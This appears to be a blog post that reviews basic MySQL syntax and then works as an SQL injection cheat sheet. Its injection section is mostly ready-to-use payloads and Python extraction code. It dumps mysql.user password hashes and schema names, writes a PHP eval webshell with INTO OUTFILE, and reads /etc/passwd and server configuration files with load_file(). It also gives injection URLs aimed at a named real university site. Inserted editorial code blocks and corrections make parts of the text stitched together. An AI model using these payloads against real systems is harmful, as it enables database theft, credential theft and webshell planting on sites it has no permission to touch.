MySQL basic syntax and SQL injection extended to the web

Source: Internet
Author: User
Tags: ord, sql injection, cheat sheet

I originally wanted to write up the Java web MVC build (Tomcat, Spring, MySQL). Yesterday I was at it until 3 in the morning, and who knew the JdbcTemplate jar simply would not cooperate; I felt like giving up. On reflection I decided to take a break and review basic MySQL syntax instead. Since I used to be familiar with web security (I read a lot of Hacker Defense and Hacker X Files and spent time in a few internet cafes, you know, o(^▽^)o), I am expanding this into web security: the common web injection methods, plus two documents I found.

First, a review of the basic create, read, update and delete statements:

-- Delete the row whose User field is Admin from the Users table
DELETE FROM Users WHERE User = 'Admin';

-- Change the password of user root in the Users table to 111111
UPDATE Users SET password = 111111 WHERE User = 'root';

-- Create a teacher table with an auto-increment id, name, address and enrolment date
-- (the VARCHAR length was lost in extraction; 50 is assumed here)
CREATE TABLE teacher (
    id      INT(3) AUTO_INCREMENT NOT NULL PRIMARY KEY,
    name    CHAR(10) NOT NULL,
    address VARCHAR(50) DEFAULT 'Shenzhen',
    year    DATE
);

-- Add a record to teacher (NULL lets AUTO_INCREMENT assign the id;
-- the original passed '', which strict SQL mode rejects for an INT column)
INSERT INTO teacher VALUES (NULL, 'Allen', 'Dalian Yi Zhong', '1976-10-10');

-- Query all records in the teacher table. SELECT is the most common statement,
-- and conditions can be appended to match the rows you want: WHERE, AND, BETWEEN,
-- ORDER BY, GROUP BY, HAVING, LEFT JOIN ... ON, UNION, LIMIT and so on.
SELECT * FROM teacher;

Database injection is a very old technique, but the database is the soul of a business or a website: if your database has been maliciously altered, we have no secrets left. Online you often hear that site XXX was hacked and all sorts of passwords and hotel check-in records were leaked; even *度 has been hacked. You also hear that most of the Penguin Empire is busy with anti-hacking and security work.

I just wrote a servlet demo.

The normal code reads the request parameter and then runs the database query through JDBC, concatenating the parameter into the SQL string.

If we pass a parameter like this: http://localhost:8080/test4/ann.do?arg=1' UNION SELECT COUNT(*) from testorders or '1'='1

the merged SQL statement carries the attacker's UNION SELECT into the database as part of the query, which is an injection vulnerability.
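The servlet's concatenated query beside a parameterised one, as an added example that is not taken from the original post. It uses Python with an in-memory SQLite database standing in for MySQL and JDBC (an assumption for the demo; the table names orders and testorders come from the page, the rows are constructed sample data). The payload is the page's, adjusted so that the second SELECT parses (WHERE instead of a bare OR after the table name).

```python
import sqlite3

# Constructed stand-in for the servlet's database: an in-memory SQLite table
# in place of MySQL, plus the testorders table the UNION payload reaches for.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE orders (id INTEGER, name TEXT);
    INSERT INTO orders VALUES (1, 'alpha'), (2, 'beta');
    CREATE TABLE testorders (id INTEGER);
    INSERT INTO testorders VALUES (10), (11), (12);
""")

# The page's payload, adjusted so the second SELECT parses (WHERE instead of a
# bare OR after the table name). Everything after the first quote is attacker SQL.
PAYLOAD = "1' UNION SELECT COUNT(*) FROM testorders WHERE '1'='1"


def build_vulnerable_sql(arg: str) -> str:
    """String concatenation, the way the servlet demo assembles its query."""
    return "SELECT name FROM orders WHERE id = '" + arg + "'"


def query_vulnerable(arg: str):
    """The 'merged' statement is handed to the database as a whole."""
    return conn.execute(build_vulnerable_sql(arg)).fetchall()


def query_safe(arg: str):
    """Parameterised query (PreparedStatement in JDBC terms): the driver sends
    arg as a value, so it can never change the statement's structure."""
    return conn.execute("SELECT name FROM orders WHERE id = ?", (arg,)).fetchall()


if __name__ == "__main__":
    print(build_vulnerable_sql(PAYLOAD))
    print("vulnerable:", query_vulnerable(PAYLOAD))   # the COUNT(*) row leaks in
    print("safe:      ", query_safe(PAYLOAD))         # no row matches
```

The vulnerable query returns the COUNT(*) of testorders as an extra row next to the legitimate result; the parameterised version compares the whole payload string against id and returns nothing, because the driver never lets the value become SQL.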

The databases I know are MySQL, MSSQL, Oracle and the lukewarm MongoDB. Whatever the engine, the operations are still just create, read, update and delete. I will stick to MySQL, since it has the most users.

version(), database() and user() are built-in functions that behave like global variables: running SELECT version() directly in the database returns the server's version string.

Whether a website is injectable can be judged manually; the usual way is to append probes such as:

1=1
and 1=2
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If the server has no anti-injection filtering, the SQL statement becomes: SELECT * FROM Orders WHERE 1=1 AND 1=2 AND 1=1; (the page behaves normally with and 1=1 appended and differently with and 1=2, which is the tell).

The same technique can also make the page return the corresponding database information:

and 1=2 UNION ALL SELECT version()/*
and 1=2 UNION ALL SELECT database()/*
and 1=2 UNION ALL SELECT user()/*

This tests whether the database version starts with the digit 5 (the arguments of mid() were lost in the source and are taken to be 1,1, the first character; MySQL compares the character '5' with the number 5 numerically):
SELECT * FROM db WHERE 1=1 AND mid(version(),1,1)=5

A UNION query can return the version information directly, but UNION requires the column counts of both halves to match:
SELECT * FROM Orders UNION SELECT 1,version() FROM Orders

Work out the number of columns in the query; if this statement runs without error, the UNION column counts match (here Orders has two columns):
SELECT * FROM Orders UNION SELECT 1,2 FROM Orders

Comparing ord(mid(version(),1,1)) < 50 (the mid() arguments are again taken to be 1,1) narrows the version down digit by digit: ord('5') is 53, so the comparison is false on a 5.x server. Moving the threshold turns this into a binary search over the code point, which recovers every character of version() even when the page displays nothing at all.
SELECT * FROM db WHERE 1=1 AND ord(mid(version(),1,1)) < 50
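As an added example (not from the original post), here is the blind-extraction loop that the ord(mid(version(),n,1)) < threshold comparison makes possible, in Python. The target is simulated with an in-memory SQLite database (an assumption: SQLite's unicode()/substr()/sqlite_version() stand in for MySQL's ord()/mid()/version(), and a non-empty result stands in for "the page rendered normally"); mysql_probe() builds the MySQL form of the fragment, and the orders table and its one row are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database with one
# row, so that a true WHERE clause returns a row and a false one returns none.
# The real target on the page is a MySQL server behind the injectable page.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, name TEXT)")
conn.execute("INSERT INTO orders VALUES (1, 'alpha')")


def mysql_probe(pos: int, threshold: int) -> str:
    """The MySQL fragment the page describes, for character `pos` of version()."""
    return f" and ord(mid(version(),{pos},1))<{threshold}"


def sqlite_oracle(pos: int, threshold: int) -> bool:
    """Simulated 'page rendered normally' oracle (assumption: SQLite's
    unicode()/substr()/sqlite_version() stand in for ord()/mid()/version()).
    coalesce(...,0) mirrors MySQL, where ord('') is 0 past the end of the string."""
    sql = ("SELECT count(*) FROM orders WHERE 1=1"
           f" and coalesce(unicode(substr(sqlite_version(),{pos},1)),0)<{threshold}")
    return conn.execute(sql).fetchone()[0] > 0


def extract_string(oracle, max_len: int = 64) -> str:
    """Recover a hidden string one character at a time. Each oracle call answers
    'is ord(char at pos) < threshold?', so a binary search over the ASCII range
    costs 7 queries per character; a code point of 0 marks the end."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 128              # invariant: lo <= code point < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(pos, mid):     # code point < mid
                hi = mid
            else:                    # code point >= mid
                lo = mid
        if lo == 0:                  # ord('') == 0: past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


def target_version() -> str:
    """What the simulated server's version() really is, for checking the result."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print(mysql_probe(1, 50))
    print(extract_string(sqlite_oracle), "==", target_version())
```

The oracle is a plain callable, so the same loop works against any page that answers true/false; against MySQL the fragment would be the one mysql_probe() returns, with the page's normal/abnormal rendering as the answer.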

This queries the current database and the current user (root, for example):
SELECT * FROM Orders UNION SELECT database(),user() FROM Orders

Number of database users:
SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT 1,count(*) FROM mysql.user

Get the password hash of the user root (on MySQL 5.7 and later the column is authentication_string, not password):
SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT 1,password FROM mysql.user WHERE user='root'

Get all database names from INFORMATION_SCHEMA, padded to the current column count:
SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT 1,schema_name FROM information_schema.schemata

information_schema.tables holds MySQL's table information:
SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT 1,table_name FROM information_schema.tables LIMIT 1,100

Get the tables of the world database; of course you first have to dump the database name:
SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='world' LIMIT 1,100

Get the columns: once you know the database and table name, you can get the column names (the table name was cut off in the source):
SELECT * FROM orders WHERE 1=1 AND 1=2 UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name = 'CI
What the hell, root... this is heading straight for dumping the password:

SELECT * FROM Orders WHERE 1=1 AND 1=2 UNION SELECT user,password FROM mysql.user

If we are bored, we can append INSERT INTO orders (name) VALUES ('hehe'); and add whatever rows we like. This only works when the driver executes stacked queries: MySQL Connector/J needs allowMultiQueries=true, and PHP's mysql_query never does.

SELECT * FROM Orders WHERE 1=1; INSERT INTO orders (name) VALUES ('hehe');

We can also save query output to a file, as long as we know the target directory; that is how a JSP, ASP or PHP webshell (a "small horse" one-liner or a "big horse" full shell) gets written, and then hehe ( ̄▽ ̄)". INTO OUTFILE needs the FILE privilege, and on current servers secure_file_priv restricts it to one directory or disables it.
SELECT user FROM mysql.user WHERE 1=1 INTO OUTFILE 'e:/sql.txt';

o(^▽^)o, the following is reproduced here so I don't forget it; reproduced from

Find the number of columns
ORDER BY num/*

Match the column count
and 1=1 UNION SELECT 1,2,3,4,5,...,n/*

Find which column positions are displayed
and 1=2 UNION SELECT 1,2,3,4,5,...,n/*

Use built-in functions to dump database information
version() database() user()

No need to guess the usable columns. Database information (does not work on some sites):

and 1=2 UNION ALL SELECT version()/*
and 1=2 UNION ALL SELECT database()/*
and 1=2 UNION ALL SELECT user()/*

Operating system information:
and 1=2 UNION ALL SELECT @@global.version_compile_os FROM mysql.user/*

Database privileges:
and ord(mid(user(),1,1))=114/*  (if the page returns normally, the user name starts with 'r', i.e. root)

Dumping the database names (MySQL > 5.0)

MySQL 5 and above has the built-in information_schema database, which stores the structure of every database and table on the server
and 1=2 UNION SELECT 1,2,3,schema_name,5,6,7,8,9,10 FROM information_schema.schemata LIMIT 0,1

Guess the tables
and 1=2 UNION SELECT 1,2,3,table_name,5,6,7,8,9,10 FROM information_schema.tables WHERE table_schema=<database name in hex> LIMIT 0,1
(LIMIT 0,1: 0 is the starting record, 0 being the first; 1 is the number of records to show)

Guess the columns
and 1=2 UNION SELECT 1,2,3,column_name,5,6,7,8,9,10 FROM information_schema.columns WHERE table_name=<table name in hex> LIMIT 0,1

Dump the password
and 1=2 UNION SELECT 1,2,3,<username column>,5,6,7,<password column>,9,10 FROM <table name> LIMIT 0,1

Advanced usage (one displayed column carries two values):
UNION SELECT 1,2,3,concat(<username column>,0x3c,<password column>),5,6,7,8,9,10 FROM <table name> LIMIT 0,1
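The union procedure above (ORDER BY to count the columns, UNION SELECT 1,2,...,n to find the displayed positions, the catalog read through one displayed slot with LIMIT offset,1, and concat() to push two values through a single slot), and the information_schema walk-through earlier on the page, as one runnable example. It is added here and is not part of the reproduced cheat sheet. It targets an in-memory SQLite database as a stand-in for MySQL (an assumption): sqlite_master.name replaces information_schema.tables.table_name and || replaces concat(). The page() function plays the injectable page, and the orders and users tables with their rows are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database in place of
# MySQL. orders is what the injectable page selects from; users is the table an
# attacker is after. Rows are made-up sample data.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE orders (id INTEGER, name TEXT, total REAL);
    INSERT INTO orders VALUES (1, 'alpha', 9.5);
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('root', 'hunter2');
""")


def page(id_param: str):
    """The injectable page: the id parameter is concatenated into the query."""
    return conn.execute(f"SELECT * FROM orders WHERE id={id_param}").fetchall()


def count_columns(max_cols: int = 20) -> int:
    """ORDER BY n succeeds while n <= the column count and errors beyond it."""
    for n in range(1, max_cols + 1):
        try:
            page(f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("more than max_cols columns")


def find_visible_columns(ncols: int):
    """and 1=2 UNION SELECT 1,2,...,n: the markers that come back show which
    column positions the page actually displays."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = page(f"1 AND 1=2 UNION SELECT {markers}")
    return [i for i in range(1, ncols + 1) if rows and rows[0][i - 1] == i]


def _union_through_slot(ncols: int, slot: int, expr: str, tail: str):
    """Pad with numeric markers and put `expr` in the displayed slot."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return page(f"1 AND 1=2 UNION SELECT {','.join(cols)} {tail}")


def dump_tables(ncols: int, slot: int):
    """Walk the catalog one row per request with LIMIT offset,1. On MySQL the
    source is information_schema.tables (table_name); SQLite's catalog is
    sqlite_master (name), an assumption of this demo."""
    names, offset = [], 0
    while True:
        rows = _union_through_slot(
            ncols, slot, "name",
            f"FROM sqlite_master WHERE type='table' LIMIT {offset},1")
        if not rows:
            break
        names.append(rows[0][slot - 1])
        offset += 1
    return names


def dump_users(ncols: int, slot: int):
    """Two values through one slot: MySQL concat(username,0x3c,password);
    SQLite spells the same thing username || '<' || password."""
    rows = _union_through_slot(ncols, slot,
                               "username || '<' || password", "FROM users")
    return [r[slot - 1] for r in rows]


if __name__ == "__main__":
    n = count_columns()
    slot = find_visible_columns(n)[1]          # use the second displayed column
    print(n, dump_tables(n, slot), dump_users(n, slot))
```

Each step only uses what the previous one learned: the column count feeds the marker row, the displayed slot feeds the catalog read, and the catalog names feed the final dump. The 0x3c separator in the original is just '<', chosen because it survives HTML rendering badly enough to be visible in the page.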

Writing a webshell directly (requires root-level privileges)
Conditions: 1. know the site's physical path;
2. have sufficient privilege (test with SELECT ... FROM mysql.user; INTO OUTFILE specifically needs the FILE privilege);
3. magic_quotes_gpc = off, so the quotes in the payload are not escaped (the setting was removed in PHP 5.4).
SELECT '<?php eval($_POST[cmd])?>' INTO OUTFILE '<physical path>'
and 1=2 UNION ALL SELECT <hex value of the one-liner> INTO OUTFILE '<path>'
On current servers secure_file_priv limits INTO OUTFILE to a single directory or disables it entirely.

load_file() reads file contents, given the privilege (root):
SELECT load_file('E:/sql.txt');
I say, what I get back is not a string but a BLOB; who knows how to handle it.... (load_file() returns a binary string, which clients display as a BLOB; wrap it in hex() or convert(... USING utf8) to read it as text.)

load_file() common paths:

1. replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
The two above are used to view a PHP file with its full code displayed. Sometimes, if you do not replace certain characters such as "<" with a space, the browser renders the result as a web page and you cannot see the code.
3. load_file(char(47)) lists the root directory on FreeBSD and SunOS
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf, the Linux Apache virtual host configuration
5. C:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf, the Windows Apache configuration
6. c:/resin-3.0.<version>/conf/resin.conf, the Resin configuration of a JSP site (the version number was lost in the source)
7. c:/resin/conf/resin.conf or /usr/local/resin/conf/resin.conf, the JSP virtual host configuration on Linux
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php, phpMyAdmin path disclosure
11. C:\windows\system32\inetsrv\MetaBase.xml, the IIS virtual host configuration
12. /usr/local/resin-3.0.22/conf/resin.conf, the Resin 3.0.22 configuration
13. /usr/local/resin-pro-3.0.22/conf/resin.conf, ditto
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf, Apache virtual hosts
15. /etc/sysconfig/iptables, the firewall policy
16. /usr/local/app/php5/lib/php.ini, PHP settings
17. /etc/my.cnf, the MySQL configuration file
18. /etc/redhat-release, the Red Hat release version
19. C:\mysql\data\mysql\user.MYD, the MySQL user table with password hashes
20. /etc/sysconfig/network-scripts/ifcfg-eth0, the IP configuration
21. /usr/local/app/php5/lib/php.ini, PHP settings
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf, virtual site settings
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. C:\windows\my.ini
25. C:\boot.ini

Common website configuration files: config.inc.php, config.php. Read them with load_file() wrapped as replace(load_file(<hex path>), char(60), char(32)).
Note:
char(60) is <
char(32) is a space

Problems with manual injection:
When the page after injection shows:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
for example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20
this is caused by inconsistent character sets between the two halves of the UNION.
Workaround: wrap the offending expression in unhex(hex(...)); unhex() returns a binary string, which has no text collation to conflict with. The URL above becomes:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user()))%20

Use of the GROUP BY statement

Using GROUP BY to dump the database's columns: it does not work on my 5.x version; this hole should belong to version 4 or 3....
